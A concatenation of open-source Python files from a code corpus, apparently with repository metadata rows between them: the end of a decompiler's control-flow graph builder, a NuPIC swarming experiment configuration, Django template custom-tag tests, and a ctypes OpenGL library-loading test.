_link(pw, w)
# Step 3:
bpw = bucket[pw]
while bpw:
v = bpw.pop()
u = _eval(v)
dom[v] = u if semi[u] < semi[v] else pw
# Step 4:
for i in range(2, n + 1):
w = vertex[i]
dw = dom[w]
if dw != vertex[semi[w]]:
dom[w] = dom[dw]
dom[graph.entry] = None
return dom
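# Illustrative helper, not part of the original decompiler: the mapping
# returned by dom_lt() (node -> immediate dominator) can be inverted into an
# explicit dominator tree when a pass needs to enumerate the nodes dominated
# by a given node.
def dominator_tree(dom):
    tree = {}
    for node, idom in dom.items():
        if idom is not None:
            tree.setdefault(idom, []).append(node)
    return tree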
def bfs(start):
to_visit = [start]
visited = set([start])
while to_visit:
node = to_visit.pop(0)
yield node
if node.exception_analysis:
for _, _, exception in node.exception_analysis.exceptions:
if exception not in visited:
to_visit.append(exception)
visited.add(exception)
for _, _, child in node.childs:
if child not in visited:
to_visit.append(child)
visited.add(child)
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def make_node(graph, block, block_to_node, vmap, gen_ret):
node = block_to_node.get(block)
if node is None:
node = build_node_from_block(block, vmap, gen_ret)
block_to_node[block] = node
if block.exception_analysis:
for _type, _, exception_target in block.exception_analysis.exceptions:
exception_node = block_to_node.get(exception_target)
if exception_node is None:
exception_node = build_node_from_block(exception_target,
vmap, gen_ret, _type)
exception_node.in_catch = True
block_to_node[exception_target] = exception_node
graph.add_catch_edge(node, exception_node)
for _, _, child_block in block.childs:
child_node = block_to_node.get(child_block)
if child_node is None:
child_node = build_node_from_block(child_block, vmap, gen_ret)
block_to_node[child_block] = child_node
graph.add_edge(node, child_node)
if node.type.is_switch:
node.add_case(child_node)
if node.type.is_cond:
if_target = ((block.end / 2) - (block.last_length / 2) +
node.off_last_ins)
child_addr = child_block.start / 2
if if_target == child_addr:
node.true = child_node
else:
node.false = child_node
    # Check that both branches of the if point to something.
    # It may happen that both branches point to the same node; in this case
    # the false branch will be None, so we set it to the right node.
# TODO: In this situation, we should transform the condition node into
# a statement node
if node.type.is_cond and node.false is None:
node.false = node.true
return node
def construct(start_block, vmap, exceptions):
bfs_blocks = bfs(start_block)
graph = Graph()
gen_ret = GenInvokeRetName()
# Construction of a mapping of basic blocks into Nodes
block_to_node = {}
exceptions_start_block = []
for exception in exceptions:
for _, _, block in exception.exceptions:
exceptions_start_block.append(block)
for block in bfs_blocks:
node = make_node(graph, block, block_to_node, vmap, gen_ret)
graph.add_node(node)
graph.entry = block_to_node[start_block]
del block_to_node, bfs_blocks
graph.compute_rpo()
graph.number_ins()
for node in graph.rpo:
preds = [pred for pred in graph.all_preds(node)
if pred.num < node.num]
if preds and all(pred.in_catch for pred in preds):
node.in_catch = True
    # Create a list of the nodes which are 'return' nodes.
    # There should be one and only one node of this type.
    # If this is not the case, try to continue anyway by setting the exit node
    # to the one which has the greatest RPO number (not necessarily the real exit).
lexit_nodes = [node for node in graph if node.type.is_return]
if len(lexit_nodes) > 1:
# Not sure that this case is possible...
logger.error('Multiple exit nodes found !')
graph.exit = graph.rpo[-1]
elif len(lexit_nodes) < 1:
# A method can have no return if it has throw statement(s) or if its
        # body is a while(1) without break/return.
logger.debug('No exit node found !')
else:
graph.exit = lexit_nodes[0]
return graph
| apache-2.0 | -671,589,271,791,483,100 | 34.220619 | 79 | 0.517562 | false |
sambitgaan/nupic | tests/swarming/nupic/swarming/experiments/oneField/description.py | 32 | 14387 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer,
DeferredDictLookup)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
# NOTE: Use of DEFERRED VALUE-GETTERs: dictionary fields and list elements
# within the config dictionary may be assigned futures derived from the
# ValueGetterBase class, such as DeferredDictLookup.
# This facility is particularly handy for enabling substitution of values in
# the config dictionary from other values in the config dictionary, which is
# needed by permutation.py-based experiments. These values will be resolved
# during the call to applyValueGettersToContainer(),
# which we call after the base experiment's config dictionary is updated from
# the sub-experiment. See ValueGetterBase and
# DeferredDictLookup for more details about value-getters.
#
# For each custom encoder parameter to be exposed to the sub-experiment/
# permutation overrides, define a variable in this section, using key names
# beginning with a single underscore character to avoid collisions with
# pre-defined keys (e.g., _dsEncoderFieldName2_N).
#
# Example:
# config = dict(
# _dsEncoderFieldName2_N = 70,
# _dsEncoderFieldName2_W = 5,
# dsEncoderSchema = [
# base=dict(
# fieldname='Name2', type='ScalarEncoder',
# name='Name2', minval=0, maxval=270, clipInput=True,
# n=DeferredDictLookup('_dsEncoderFieldName2_N'),
# w=DeferredDictLookup('_dsEncoderFieldName2_W')),
# ],
# )
# updateConfigFromSubConfig(config)
# applyValueGettersToContainer(config)
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'gym', 'first'),
(u'consumption', 'mean'),
(u'address', 'first')],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalNextStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# dsEncoderSchema = [
# DeferredDictLookup('__field_name_encoder'),
# ],
#
# (value generated from DS_ENCODER_SCHEMA)
'encoders': {
'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'maxval': 200,
'minval': 0,
'n': 1500,
'name': u'consumption',
'type': 'ScalarEncoder',
'w': 21
},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
        # Valid keys are any desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
        # What percent of the column's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
        # The number of cells (i.e., states) allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 15,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
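# Illustrative example (values not used by this experiment): with an
# aggregation period of 15 minutes and a predictAheadTime of one hour, the
# division above would yield predictionSteps == 4 and the classifier would be
# configured with 'steps': '4'.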
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupicengine/cluster/database/StreamDef.json.
#
'dataset' : { u'info': u'test_NoProviders',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
#'iterationCount' : ITERATION_COUNT,
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption',
inferenceElement=InferenceElement.prediction,
metric='rmse'),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*nupicScore.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| agpl-3.0 | -5,583,674,659,747,028,000 | 36.860526 | 110 | 0.607701 | false |
ABaldwinHunter/django-clone-classic | tests/template_tests/test_custom.py | 116 | 19622 | from __future__ import unicode_literals
import os
from unittest import skipUnless
from django.template import Context, Engine, TemplateSyntaxError
from django.template.base import Node
from django.template.library import InvalidTemplateLibrary
from django.test import SimpleTestCase
from django.test.utils import extend_sys_path
from django.utils import six
from .templatetags import custom, inclusion
from .utils import ROOT
LIBRARIES = {
'custom': 'template_tests.templatetags.custom',
'inclusion': 'template_tests.templatetags.inclusion',
}
class CustomFilterTests(SimpleTestCase):
def test_filter(self):
engine = Engine(libraries=LIBRARIES)
t = engine.from_string("{% load custom %}{{ string|trim:5 }}")
self.assertEqual(
t.render(Context({"string": "abcdefghijklmnopqrstuvwxyz"})),
"abcde"
)
class TagTestCase(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(app_dirs=True, libraries=LIBRARIES)
super(TagTestCase, cls).setUpClass()
def verify_tag(self, tag, name):
self.assertEqual(tag.__name__, name)
self.assertEqual(tag.__doc__, 'Expected %s __doc__' % name)
self.assertEqual(tag.__dict__['anything'], 'Expected %s __dict__' % name)
class SimpleTagTests(TagTestCase):
def test_simple_tags(self):
c = Context({'value': 42})
templates = [
('{% load custom %}{% no_params %}', 'no_params - Expected result'),
('{% load custom %}{% one_param 37 %}', 'one_param - Expected result: 37'),
('{% load custom %}{% explicit_no_context 37 %}', 'explicit_no_context - Expected result: 37'),
('{% load custom %}{% no_params_with_context %}',
'no_params_with_context - Expected result (context value: 42)'),
('{% load custom %}{% params_and_context 37 %}',
'params_and_context - Expected result (context value: 42): 37'),
('{% load custom %}{% simple_two_params 37 42 %}', 'simple_two_params - Expected result: 37, 42'),
('{% load custom %}{% simple_one_default 37 %}', 'simple_one_default - Expected result: 37, hi'),
('{% load custom %}{% simple_one_default 37 two="hello" %}',
'simple_one_default - Expected result: 37, hello'),
('{% load custom %}{% simple_one_default one=99 two="hello" %}',
'simple_one_default - Expected result: 99, hello'),
('{% load custom %}{% simple_one_default 37 42 %}',
'simple_one_default - Expected result: 37, 42'),
('{% load custom %}{% simple_unlimited_args 37 %}', 'simple_unlimited_args - Expected result: 37, hi'),
('{% load custom %}{% simple_unlimited_args 37 42 56 89 %}',
'simple_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_only_unlimited_args %}', 'simple_only_unlimited_args - Expected result: '),
('{% load custom %}{% simple_only_unlimited_args 37 42 56 89 %}',
'simple_only_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'simple_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
for entry in templates:
t = self.engine.from_string("%s as var %%}Result: {{ var }}" % entry[0][0:-2])
self.assertEqual(t.render(c), "Result: %s" % entry[1])
def test_simple_tag_errors(self):
errors = [
("'simple_one_default' received unexpected keyword argument 'three'",
'{% load custom %}{% simple_one_default 99 two="hello" three="foo" %}'),
("'simple_two_params' received too many positional arguments",
'{% load custom %}{% simple_two_params 37 42 56 %}'),
("'simple_one_default' received too many positional arguments",
'{% load custom %}{% simple_one_default 37 42 56 %}'),
("'simple_unlimited_args_kwargs' received some positional argument(s) after some keyword argument(s)",
'{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 eggs="scrambled" 56 four=1|add:3 %}'),
("'simple_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load custom %}{% simple_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string("%s as var %%}" % entry[1][0:-2])
def test_simple_tag_escaping_autoescape_off(self):
c = Context({'name': "Jack & Jill"}, autoescape=False)
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_naive_escaping(self):
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_explicit_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_explicit %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_format_html_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_format_html %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.no_params, 'no_params')
self.verify_tag(custom.one_param, 'one_param')
self.verify_tag(custom.explicit_no_context, 'explicit_no_context')
self.verify_tag(custom.no_params_with_context, 'no_params_with_context')
self.verify_tag(custom.params_and_context, 'params_and_context')
self.verify_tag(custom.simple_unlimited_args_kwargs, 'simple_unlimited_args_kwargs')
self.verify_tag(custom.simple_tag_without_context_parameter, 'simple_tag_without_context_parameter')
def test_simple_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'simple_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% simple_tag_without_context_parameter 123 %}')
class InclusionTagTests(TagTestCase):
def test_inclusion_tags(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params %}', 'inclusion_no_params - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param 37 %}', 'inclusion_one_param - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context 37 %}',
'inclusion_explicit_no_context - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context %}',
'inclusion_no_params_with_context - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context 37 %}',
'inclusion_params_and_context - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params 37 42 %}',
'inclusion_two_params - Expected result: 37, 42\n'),
(
'{% load inclusion %}{% inclusion_one_default 37 %}',
'inclusion_one_default - Expected result: 37, hi\n'
),
('{% load inclusion %}{% inclusion_one_default 37 two="hello" %}',
'inclusion_one_default - Expected result: 37, hello\n'),
('{% load inclusion %}{% inclusion_one_default one=99 two="hello" %}',
'inclusion_one_default - Expected result: 99, hello\n'),
('{% load inclusion %}{% inclusion_one_default 37 42 %}',
'inclusion_one_default - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 %}',
'inclusion_unlimited_args - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 42 56 89 %}',
'inclusion_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args %}',
'inclusion_only_unlimited_args - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args 37 42 56 89 %}',
'inclusion_only_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'inclusion_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_errors(self):
errors = [
("'inclusion_one_default' received unexpected keyword argument 'three'",
'{% load inclusion %}{% inclusion_one_default 99 two="hello" three="foo" %}'),
("'inclusion_two_params' received too many positional arguments",
'{% load inclusion %}{% inclusion_two_params 37 42 56 %}'),
("'inclusion_one_default' received too many positional arguments",
'{% load inclusion %}{% inclusion_one_default 37 42 56 %}'),
("'inclusion_one_default' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_one_default %}'),
("'inclusion_unlimited_args' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_unlimited_args %}'),
(
"'inclusion_unlimited_args_kwargs' received some positional argument(s) "
"after some keyword argument(s)",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 eggs="boiled" 56 four=1|add:3 %}',
),
("'inclusion_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
def test_include_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'inclusion_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load inclusion %}{% inclusion_tag_without_context_parameter 123 %}')
def test_inclusion_tags_from_template(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params_from_template %}',
'inclusion_no_params_from_template - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param_from_template 37 %}',
'inclusion_one_param_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context_from_template 37 %}',
'inclusion_explicit_no_context_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context_from_template %}',
'inclusion_no_params_with_context_from_template - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context_from_template 37 %}',
'inclusion_params_and_context_from_template - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params_from_template 37 42 %}',
'inclusion_two_params_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 %}',
'inclusion_one_default_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 42 %}',
'inclusion_one_default_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template %}',
'inclusion_only_unlimited_args_from_template - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_only_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(inclusion.inclusion_no_params, 'inclusion_no_params')
self.verify_tag(inclusion.inclusion_one_param, 'inclusion_one_param')
self.verify_tag(inclusion.inclusion_explicit_no_context, 'inclusion_explicit_no_context')
self.verify_tag(inclusion.inclusion_no_params_with_context, 'inclusion_no_params_with_context')
self.verify_tag(inclusion.inclusion_params_and_context, 'inclusion_params_and_context')
self.verify_tag(inclusion.inclusion_two_params, 'inclusion_two_params')
self.verify_tag(inclusion.inclusion_one_default, 'inclusion_one_default')
self.verify_tag(inclusion.inclusion_unlimited_args, 'inclusion_unlimited_args')
self.verify_tag(inclusion.inclusion_only_unlimited_args, 'inclusion_only_unlimited_args')
self.verify_tag(inclusion.inclusion_tag_without_context_parameter, 'inclusion_tag_without_context_parameter')
self.verify_tag(inclusion.inclusion_tag_use_l10n, 'inclusion_tag_use_l10n')
self.verify_tag(inclusion.inclusion_unlimited_args_kwargs, 'inclusion_unlimited_args_kwargs')
def test_15070_use_l10n(self):
"""
Test that inclusion tag passes down `use_l10n` of context to the
Context of the included/rendered template as well.
"""
c = Context({})
t = self.engine.from_string('{% load inclusion %}{% inclusion_tag_use_l10n %}')
self.assertEqual(t.render(c).strip(), 'None')
c.use_l10n = True
self.assertEqual(t.render(c).strip(), 'True')
def test_no_render_side_effect(self):
"""
#23441 -- InclusionNode shouldn't modify its nodelist at render time.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_no_params %}')
count = template.nodelist.get_nodes_by_type(Node)
template.render(Context({}))
self.assertEqual(template.nodelist.get_nodes_by_type(Node), count)
def test_render_context_is_cleared(self):
"""
#24555 -- InclusionNode should push and pop the render_context stack
when rendering. Otherwise, leftover values such as blocks from
extending can interfere with subsequent rendering.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_extends1 %}{% inclusion_extends2 %}')
self.assertEqual(template.render(Context({})).strip(), 'one\ntwo')
class AssignmentTagTests(TagTestCase):
def test_assignment_tags(self):
c = Context({'value': 42})
t = self.engine.from_string('{% load custom %}{% assignment_no_params as var %}The result is: {{ var }}')
self.assertEqual(t.render(c), 'The result is: assignment_no_params - Expected result')
def test_assignment_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.assignment_no_params, 'assignment_no_params')
def test_assignment_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'assignment_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% assignment_tag_without_context_parameter 123 as var %}')
class TemplateTagLoadingTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.egg_dir = os.path.join(ROOT, 'eggs')
super(TemplateTagLoadingTests, cls).setUpClass()
def test_load_error(self):
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'template_tests.broken_tag': cannot import name "
"'?Xtemplate'?"
)
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_tag': 'template_tests.broken_tag',
})
def test_load_error_egg(self):
egg_name = '%s/tagsegg.egg' % self.egg_dir
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'tagsegg.templatetags.broken_egg': cannot "
"import name '?Xtemplate'?"
)
with extend_sys_path(egg_name):
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_egg': 'tagsegg.templatetags.broken_egg',
})
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
with extend_sys_path(egg_name):
engine = Engine(libraries={
'working_egg': 'tagsegg.templatetags.working_egg',
})
engine.from_string(ttext)
@skipUnless(six.PY3, "Python 3 only -- Python 2 doesn't have annotations.")
def test_load_annotated_function(self):
Engine(libraries={
'annotated_tag_function': 'template_tests.annotated_tag_function',
})
| bsd-3-clause | -6,156,823,158,680,823 | 51.605898 | 118 | 0.608552 | false |
lokirius/python-for-android | python3-alpha/python3-src/Lib/ctypes/test/test_find.py | 65 | 2470 | import unittest
import sys
from ctypes import *
from ctypes.util import find_library
from ctypes.test import is_resource_enabled
if sys.platform == "win32":
lib_gl = find_library("OpenGL32")
lib_glu = find_library("Glu32")
lib_gle = None
elif sys.platform == "darwin":
lib_gl = lib_glu = find_library("OpenGL")
lib_gle = None
else:
lib_gl = find_library("GL")
lib_glu = find_library("GLU")
lib_gle = find_library("gle")
## print, for debugging
if is_resource_enabled("printing"):
if lib_gl or lib_glu or lib_gle:
print("OpenGL libraries:")
for item in (("GL", lib_gl),
("GLU", lib_glu),
("gle", lib_gle)):
print("\t", item)
# On some systems, loading the OpenGL libraries needs the RTLD_GLOBAL mode.
class Test_OpenGL_libs(unittest.TestCase):
def setUp(self):
self.gl = self.glu = self.gle = None
if lib_gl:
self.gl = CDLL(lib_gl, mode=RTLD_GLOBAL)
if lib_glu:
self.glu = CDLL(lib_glu, RTLD_GLOBAL)
if lib_gle:
try:
self.gle = CDLL(lib_gle)
except OSError:
pass
if lib_gl:
def test_gl(self):
if self.gl:
self.gl.glClearIndex
if lib_glu:
def test_glu(self):
if self.glu:
self.glu.gluBeginCurve
if lib_gle:
def test_gle(self):
if self.gle:
self.gle.gleGetJoinStyle
##if os.name == "posix" and sys.platform != "darwin":
## # On platforms where the default shared library suffix is '.so',
## # at least some libraries can be loaded as attributes of the cdll
## # object, since ctypes now tries loading the lib again
## # with '.so' appended if the first try fails.
## #
## # Won't work for libc, unfortunately. OTOH, it isn't
## # needed for libc since this is already mapped into the current
## # process (?)
## #
## # On MAC OSX, it won't work either, because dlopen() needs a full path,
## # and the default suffix is either none or '.dylib'.
